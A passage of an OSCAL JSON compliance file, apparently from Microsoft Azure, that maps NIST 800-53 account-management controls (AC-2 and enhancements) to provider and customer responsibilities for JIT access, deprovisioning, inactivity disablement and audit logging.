The access request submitted through the JIT portal is first adjudicated by system policies, then further evaluated against policies defined by the service that owns the resource, which can immediately deny the request, approve the request if conditions are met, or route the request to appropriate team members based on the workflow configured in the service team policy, which is also dual-key.\n\nBarring any approved exceptions (including those approved due to lack of JIT support), the only persistent elevated access permitted to the Azure production environment is JIT break-glass access, which alerts the resource owner when invoked.\n\nAzure account authorizers review accounts quarterly. Additionally, when a user is promoted or transferred to another group, the account authorizers review the user's role and access rights and modify or revoke them as necessary according to the access policies. Furthermore, after a transfer, OneIdentity automatically terminates access that is not manually re-approved, depending on the rules configured for the project and the new manager's approval. The user is required to resubmit a request for access when that individual's access is close to expiring.\n\nFor additional protection, Azure Security Monitoring (ASM) and SCUBA monitor service team operating systems for unexpected account creations. This includes monitoring for cases where an administrator or privileged role is added to an Azure subscription at the operating system layer, which is intended to prevent persistent access from bypassing the JIT process.\n\nWhen a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR Administrator and the user. The user's resignation includes the user's last working day. 
If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. On the user's last day, referred to as the termination date, access is shut off automatically since the Manager Self-Service (MSS) system is tied to the SAP systems; the user's status switches to inactive and they are removed from payroll and benefits. If the user is leaving for a competitor, their access to the environment and buildings is terminated within forty-eight (48) hours.\n\nOneIdentity disables any user accounts daily if no HR record exists within the MSS system, such as after termination, or if the accounts have been inactive over one hundred and eighty (180) days. Accounts that have been disabled for fifteen (15) days after one hundred and eighty (180) days of inactivity are deleted. Accounts can also be requested for disabling via OneIdentity and MyAccess."}],"responsibilities":[{"uuid":"ccd79f08-ef46-4fd9-882c-4c1de18d944f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"}],"description":"The customer is responsible for establishing an account management process for all customer-controlled account types. 
Azure can synchronize users and groups, allowing them to be used to grant users permissions to resources in Azure.","provided-uuid":"1e323e41-f0d4-4034-ba3b-b2b47a483873"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2e24bc82-1a54-459a-8130-3c071e9d8d45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.g","by-components":[{"uuid":"9e37b5ea-3bec-4141-aa1d-f108708d00fd","export":{"provided":[{"uuid":"6b4cfe39-0df0-41ad-aff8-9183eee2856c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"}],"description":"Azure monitors the use of information system accounts using the audit logging and monitoring pipeline. 
This includes the appropriate configuration of local log settings, the central collection of log data, and the detection and alerting of suspicious activity."}],"responsibilities":[{"uuid":"2fdfb2f1-408e-4334-aad2-73290f0395e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"}],"description":"The customer is responsible for monitoring the use of all customer-controlled accounts.","provided-uuid":"6b4cfe39-0df0-41ad-aff8-9183eee2856c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6cc4bfc4-66aa-4848-81a7-68d1e7b9782d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"statement-id":"ac-2_smt.h","by-components":[{"uuid":"2d77d08c-5b11-4e12-9497-17da96e6af22","export":{"provided":[{"uuid":"f7d0739a-e5ae-45ad-98aa-38666a166637","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. 
If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or at the time access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated daily to determine whether their owners are still actively employed by Microsoft. The OneIdentity Life Cycle Management job runs daily to disable any user accounts within Azure domains if there is no HR record or if they have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record, have had a position change in the HR record, or have been flagged as inactive are then disabled by the tools."},{"uuid":"4b5d0850-db9b-407a-ae47-f637e765bd0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. 
The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or at the time access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated daily to determine whether their owners are still actively employed by Microsoft. The OneIdentity Life Cycle Management job runs daily to disable any user accounts within Azure domains if there is no HR record or if they have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. 
Any user accounts that do not have a matching HR record, have had a position change in the HR record, or have been flagged as inactive are then disabled by the tools."},{"uuid":"dfa3cb0b-3ccb-4066-a854-1b401a7313f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or at the time access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated daily to determine whether their owners are still actively employed by Microsoft. 
The OneIdentity Life Cycle Management job runs daily to disable any user accounts within Azure domains if there is no HR record or if they have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record, have had a position change in the HR record, or have been flagged as inactive are then disabled by the tools."}],"responsibilities":[{"uuid":"2186543c-0096-4393-b86d-0ae077538ef5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"f7d0739a-e5ae-45ad-98aa-38666a166637"},{"uuid":"8038e4b1-e33a-42e4-b414-37073d84bf72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. 
All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"4b5d0850-db9b-407a-ae47-f637e765bd0c"},{"uuid":"32c4d311-2877-484e-b7dc-a29254d5b5f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. 
Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"dfa3cb0b-3ccb-4066-a854-1b401a7313f9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cf885f12-7749-4cf0-893f-da7889a4674f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"statement-id":"ac-2_smt.i","by-components":[{"uuid":"5705457c-bc37-4400-9f05-70df3dd50a7e","export":{"provided":[{"uuid":"a20e205a-9baa-4281-ba07-4707413e7b03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups, and thus privileges in the Azure environment, are approved based upon criteria that determine the appropriateness of the requested role; the approval is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. 
The service owner and account approvers can request changes to the access of AD accounts on their service through OneIdentity."},{"uuid":"6f7fc8a9-c486-4931-80ff-98ae499123da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups, and thus privileges in the Azure environment, are approved based upon criteria that determine the appropriateness of the requested role; the approval is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. The service owner and account approvers can request changes to the access of AD accounts on their service through OneIdentity."},{"uuid":"c9c7bb42-5397-4f6f-8f60-8004da677ff9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups, and thus privileges in the Azure environment, are approved based upon criteria that determine the appropriateness of the requested role; the approval is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. 
The service owner and account approvers can request changes to the access of AD accounts on their service through OneIdentity."}],"responsibilities":[{"uuid":"64e85edc-06b5-4c56-b9db-aa38da19c8b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"a20e205a-9baa-4281-ba07-4707413e7b03"},{"uuid":"3438299f-450e-40ad-a954-6dd8bb69e45e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"6f7fc8a9-c486-4931-80ff-98ae499123da"},{"uuid":"fe701b38-5595-4e28-ba20-b1743b2f19af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"c9c7bb42-5397-4f6f-8f60-8004da677ff9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53c534b0-ad03-4109-ab0a-fc454b066be9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.j","by-components":[{"uuid":"d70ee76c-0c71-4dd1-9fff-2cef4f533afe","export":{"provided":[{"uuid":"007bc294-ba78-40e0-b100-b3aede645524","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"}],"description":"Access is based on specific roles and duties to support the operational environments. 
The foundation is twofold: granting elevated access for a limited duration through JIT, not to exceed twenty-four (24) hours; and a formal program that monitors account activities, enabled by auditing account management actions. This provides ongoing review of accounts and alerts on changes. The objective is a continuous rather than static review of access authorizations and activities. There is no standing privileged access to the Azure production environment. Azure utilizes Just in Time (JIT) access and Break-Glass accounts for the implementation of this control. Individuals request elevated access for a specific, limited purpose. Upon approval, JIT grants temporary audited access on the Azure asset (e.g., assign RBAC role, assign claim, generate account and assign to the local administrator group on a virtual machine, etc.). The access is automatically revoked after a set limited time and all access grants are securely audited using the JIT system and/or destination resource logging mechanisms. JIT terminates access based on the rules configured in the adjudicating policy, as defined by the resource owner. Once a JIT grant has expired, the access is revoked and the user must submit a new request for access if access is still required. Because no JIT access is provided exceeding twenty-four (24) hours, and all JIT requests are reviewed prior to approval either manually or via automated rules set by the owning service team, the intent of this requirement is met. Break-Glass accounts, which have persistent elevated access to the production environment, are only utilized in Break-Glass situations when JIT is inaccessible. The use of these accounts generates a Severity 2 ticket, which requires immediate review, meeting the intent of the requirement. Microsoft also executes a Quarterly Access Review (QAR) of all accounts. A full inventory of accounts is analyzed with the managers of each account identified. 
Managers are required to revalidate access for an account to remain active. If a manager indicates an account is no longer necessary, or a manager does not respond, the account is deactivated."}],"responsibilities":[{"uuid":"cb258854-89ec-4cae-b887-68ce9afd2d10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"}],"description":"The customer is responsible for reviewing customer-controlled accounts at the required frequency to determine if accounts are compliant with all organization requirements.","provided-uuid":"007bc294-ba78-40e0-b100-b3aede645524"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a775924c-e49f-43e9-875f-ba5bc4ff1863","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.k","by-components":[{"uuid":"75e56736-07cf-41b9-9ebc-c34df1425b26","export":{"provided":[{"uuid":"791e3b8f-ac7c-46a2-a56e-df97f9aa0d14","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where the local account or accounts cannot be deleted or disabled, or where necessary for Break-Glass access. For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associating the secret store logs with the group or shared account usage. 
When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing user activity to the shared account."}],"responsibilities":[{"uuid":"c6b90515-1c17-48ba-9535-a9b3835dd7a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"}],"description":"The customer is responsible for the management of customer-controlled shared/group account credentials when a user is removed from the shared/group account.","provided-uuid":"791e3b8f-ac7c-46a2-a56e-df97f9aa0d14"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"59658ca9-5eb2-4aa9-a603-6770bc529f7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.l","by-components":[{"uuid":"04b44f95-e7a2-4a88-a3ba-994461dcc56e","export":{"provided":[{"uuid":"e3336fc6-8492-41b4-a695-76529a056b22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"}],"description":"Azure aligns account management processes with personnel termination and transfer processes. When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR Administrator and the user. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. 
The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. On the user's last day, referred to as the termination date, access is shut off automatically since the Employee Central (EC) system is tied to the SAP systems; the user's status switches to inactive and they are removed from payroll and benefits. If the user is leaving for a competitor, their access to the environment and buildings is terminated within forty-eight (48) hours of their notification to terminate. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users are deactivated automatically upon OneIdentity's sync with the SAP HR system. Transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated daily to determine whether their owners are still actively employed by Microsoft. The OneIdentity Life Cycle Management job runs daily to disable any user accounts within Azure domains if there is no HR record or if they have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. 
Any user accounts that do not have a matching HR record, have had a position change in the HR record, or have been flagged as inactive are then disabled by the tools."}],"responsibilities":[{"uuid":"68f40800-aef8-4f66-a6bc-c16354ed98ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"}],"description":"The customer is responsible for aligning account management processes with personnel termination and transfer processes for customer-deployed resources.","provided-uuid":"e3336fc6-8492-41b4-a695-76529a056b22"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2230551e-5477-4267-8efb-ea8611141c7a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.1","statements":[{"uuid":"b945ad67-d3f1-4617-8aaf-be10b1ddeec5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.1_smt","by-components":[{"uuid":"2fd49ffb-c2af-4772-a611-0e869cae649b","export":{"provided":[{"uuid":"4fafb2b3-d4ee-47c8-a928-c8d8fc166f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"}],"description":"CorpNet and Azure access are provisioned and managed using separate account management tools. CorpNet account management, using MyAccess, cannot provide access to Azure; it can only provide access to AD security groups that the Azure account management tool, OneIdentity, leverages. 
All standard access requests and approvals are managed through OneIdentity and MyAccess, supporting Azure and CorpNet respectively, which are automated workflow management tools that track the process for all account requests, approvals, creations, modifications, and deletions. Azure uses Just in Time (JIT) access for elevated access to Azure. Individuals request access for a specific, limited purpose. Upon approval, JIT grants temporary, audited membership to the local administrator group or elevated role (e.g. Subscription Owner, Contributor, etc.). The membership is automatically revoked after a limited duration defined by the JIT policy, and all access grants are securely audited."}],"responsibilities":[{"uuid":"4740009b-9e5e-40fe-9af6-a3366b24f453","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"}],"description":"The customer is responsible for employing automated mechanisms to support account management activities for the account types defined in AC-02.a. All federal customers in the Azure environment use identity federation and are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. 
Changes made to users' permissions in the Federal Customer AD will be reflected in the claim presented via ADFS the next time a Federal user is authenticated.","provided-uuid":"4fafb2b3-d4ee-47c8-a928-c8d8fc166f16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4e429296-bd3b-483d-80a9-253cd4d2005a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.2","statements":[{"uuid":"3c280ba9-a2c1-4850-baf3-a7a693401317","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.2_smt","by-components":[{"uuid":"4c589193-e014-4762-b3d6-0c55a82e0c5d","export":{"provided":[{"uuid":"03cbb0e6-e660-4da6-85d7-08283f75f5c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"}],"description":"The Microsoft Security Program Policy prohibits the use of temporary and emergency accounts. All local guest accounts are disabled on the system or platform wherever they are located. All account requests follow the standard account management process, including domain account request and approval and OneIdentity-based group management.\n\nFor servers that are not domain-joined, the JIT process for granting access to a server includes creating and enabling a local account for the duration of access. 
Because this access is tied to a specific user's domain account and requires that the user first authenticate using multifactor authentication, Azure does not consider this local account to be a temporary account for purposes of this control."}],"responsibilities":[{"uuid":"d181aac4-9443-4d03-aa45-7e95663c34eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"}],"description":"The customer is responsible for configuring the system to automatically remove or disable emergency and temporary accounts if those accounts have been defined in AC-02.a. **Customer Identity Federation** Federal user entities are responsible for having a process in place for account management of their users by creating new user accounts for new employees, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. 
Federal customer authentication requests are processed by the customer authentication environment; when an employee is terminated in the customer environment, they are no longer able to authenticate to the Azure environment.","provided-uuid":"03cbb0e6-e660-4da6-85d7-08283f75f5c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3bcecbc7-40a8-4cb1-a7cb-0154ea841b6d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.3","statements":[{"uuid":"6affbcc1-7871-4ebf-a77d-91eab4ef1447","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.3_smt","by-components":[{"uuid":"1afb30c6-5ff7-4358-a9b5-d6527e702b15","export":{"provided":[{"uuid":"9a9dc13a-e280-4bbf-9080-a41639603d6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"}],"description":"User accounts are automatically evaluated to determine if they are actively being used by Microsoft users. OneIdentity receives a daily HR feed of personnel, which it compares to the list of users. Any user accounts that do not have a matching HR record or have been flagged as inactive are then disabled by this process.\n\nThe OneIdentity process is used to disable any user accounts within AME and GME on a daily basis if there are no associated HR records or the user accounts have been inactive for more than 90 days (AME) or 84 days (GME). 
All user accounts are automatically disabled once the applicable inactivity period has elapsed.\n\nInactive service accounts are not disabled by this process. In an Active Directory environment, every service account ID is unique and cannot be reused or spoofed, so Azure does not treat retiring or disabling service account IDs as mitigating a risk."}],"responsibilities":[{"uuid":"606cff13-8f30-42b2-afca-eb10fb157d43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"}],"description":"The customer is responsible for configuring the system to automatically disable user accounts (for account types identified in AC-02.a) after an organization-defined period of inactivity. **Customer Identity Federation** Federal user entities are responsible for having a process in place for account management of their users by creating new user accounts for new employees, modifying access in accordance with changes in employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Since Federal user entities are authenticated by federal authentication systems and federated via ADFS, when users are terminated from the federal authentication provider they also lose access to Microsoft Azure. 
Federal user entities are responsible for automatically disabling federal Microsoft Azure accounts when the accounts are inactive or no longer used.","provided-uuid":"9a9dc13a-e280-4bbf-9080-a41639603d6e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"234c638c-5487-4e9a-9142-2b14efa32d71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.4","statements":[{"uuid":"3a46ad46-e562-44c1-991f-69b30f1bbda0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.4_smt","by-components":[{"uuid":"9704f7f4-5ba8-4106-a8b4-d141b99cd172","export":{"provided":[{"uuid":"15b30bb1-274d-42f8-afc5-aab2a72d3c4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"}],"description":"OneIdentity, which is used to manage all Azure domain accounts, automatically logs account creation, modification, and disablement actions, which are ingested into Geneva Monitoring.\n\nServers\n\nAzure performs auditing of elevated user accounts at the asset layer through Geneva Monitoring. The servers provide a record of account creation, modification, disabling, and termination, and the Security Response Team is notified of any suspicious activity.\n\nNetwork Devices\n\nNetwork device access is audited via logs from the Authentication, Authorization, and Accounting (AAA) system. 
